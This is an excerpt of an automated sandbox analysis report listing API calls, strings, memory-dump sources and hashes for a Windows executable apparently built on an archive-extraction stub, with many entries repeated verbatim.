                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetEndOfFile.KERNELBASE(?,007C903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 007C9F0C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File
                                                                      • String ID:
                                                                      • API String ID: 749574446-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,007DAE72,C:\Users\user\Desktop,00000000,0080946A,00000006), ref: 007DAC08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory
                                                                      • String ID:
                                                                      • API String ID: 1611563598-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 007DC2B1
                                                                      • EndDialog.USER32(?,00000006), ref: 007DC2C4
                                                                      • GetDlgItem.USER32(?,0000006C), ref: 007DC2E0
                                                                      • SetFocus.USER32(00000000), ref: 007DC2E7
                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 007DC321
                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 007DC358
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 007DC36E
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DC38C
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 007DC39C
                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007DC3B8
                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007DC3D4
                                                                      • _swprintf.LIBCMT ref: 007DC404
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 007DC417
                                                                      • FindClose.KERNEL32(00000000), ref: 007DC41E
                                                                      • _swprintf.LIBCMT ref: 007DC477
                                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 007DC48A
                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 007DC4A7
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 007DC4C7
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 007DC4D7
                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007DC4F1
                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007DC509
                                                                      • _swprintf.LIBCMT ref: 007DC535
                                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 007DC548
                                                                      • _swprintf.LIBCMT ref: 007DC59C
                                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 007DC5AF
                                                                        • Part of subcall function 007DAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007DAF35
                                                                        • Part of subcall function 007DAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,007FE72C,?,?), ref: 007DAF84
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                      • String ID: %s %s$%s %s %s$P}$REPLACEFILEDLG
                                                                      • API String ID: 797121971-4264152612
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C6FAA
                                                                      • _wcslen.LIBCMT ref: 007C7013
                                                                      • _wcslen.LIBCMT ref: 007C7084
                                                                        • Part of subcall function 007C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 007C7AAB
                                                                        • Part of subcall function 007C7A9C: GetLastError.KERNEL32 ref: 007C7AF1
                                                                        • Part of subcall function 007C7A9C: CloseHandle.KERNEL32(?), ref: 007C7B00
                                                                        • Part of subcall function 007CA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,007C977F,?,?,007C95CF,?,?,?,?,?,007F2641,000000FF), ref: 007CA1F1
                                                                        • Part of subcall function 007CA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,007C977F,?,?,007C95CF,?,?,?,?,?,007F2641), ref: 007CA21F
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 007C7139
                                                                      • CloseHandle.KERNEL32(00000000), ref: 007C7155
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 007C7298
                                                                        • Part of subcall function 007C9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007C73BC,?,?,?,00000000), ref: 007C9DBC
                                                                        • Part of subcall function 007C9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 007C9E70
                                                                        • Part of subcall function 007C9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,007C95D6,?,?,?,?,?,007F2641,000000FF), ref: 007C963B
                                                                        • Part of subcall function 007CA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA501
                                                                        • Part of subcall function 007CA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA532
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                      • API String ID: 2821348736-3508440684
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog_swprintf
                                                                      • String ID: CMT$h%u$hc%u
                                                                      • API String ID: 146138363-3282847064
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C2874
                                                                      • _strlen.LIBCMT ref: 007C2E3F
                                                                        • Part of subcall function 007D02BA: __EH_prolog.LIBCMT ref: 007D02BF
                                                                        • Part of subcall function 007D1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007CBAE9,00000000,?,?,?,0001047C), ref: 007D1BA0
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007C2F91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                      • String ID: CMT
                                                                      • API String ID: 1206968400-2756464174
                                                                      • Opcode ID: 0a89175d552044054558f90ba6ee16075edac66cabfc3ff819807757c9ef9bbf
                                                                      • Instruction ID: 0a71fb35cb7425519d723a6c4f7f8d8c8cc11483c0e7e8753aff80e46ae9ed5e
                                                                      • Opcode Fuzzy Hash: 0a89175d552044054558f90ba6ee16075edac66cabfc3ff819807757c9ef9bbf
                                                                      • Instruction Fuzzy Hash: 2762D671600245DFDB19DF74C899FEA37A1AF54300F08857EEC9A8B283DB799946CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007DF844
                                                                      • IsDebuggerPresent.KERNEL32 ref: 007DF910
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007DF930
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 007DF93A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                      • String ID:
                                                                      • API String ID: 254469556-0
                                                                      • Opcode ID: 0ef4f760dcbc96d8236db513431f0909bd6b44c40a7c0f94d2982c02c92f1111
                                                                      • Instruction ID: 3b2fb5f1b30769196079eaa2e8f4290ea81e3985f6601d1a01713d4ab9f56e9c
                                                                      • Opcode Fuzzy Hash: 0ef4f760dcbc96d8236db513431f0909bd6b44c40a7c0f94d2982c02c92f1111
                                                                      • Instruction Fuzzy Hash: 32310775D0521DDBDB20DFA4D9897CCBBB8AF08304F1040AAE40DAB350EB759A84CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualQuery.KERNEL32(80000000,007DE5E8,0000001C,007DE7DD,00000000,?,?,?,?,?,?,?,007DE5E8,00000004,00821CEC,007DE86D), ref: 007DE6B4
                                                                      • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,007DE5E8,00000004,00821CEC,007DE86D), ref: 007DE6CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: InfoQuerySystemVirtual
                                                                      • String ID: D
                                                                      • API String ID: 401686933-2746444292
                                                                      • Opcode ID: a32b0bf872bbab294943d366cad595b5b4f50f7e2ce7d55cc4e3128948b0e295
                                                                      • Instruction ID: 72dad5930a6dd962cb8c39edcef82f375aa8e0ab5124bcac54f80ac334de9ac4
                                                                      • Opcode Fuzzy Hash: a32b0bf872bbab294943d366cad595b5b4f50f7e2ce7d55cc4e3128948b0e295
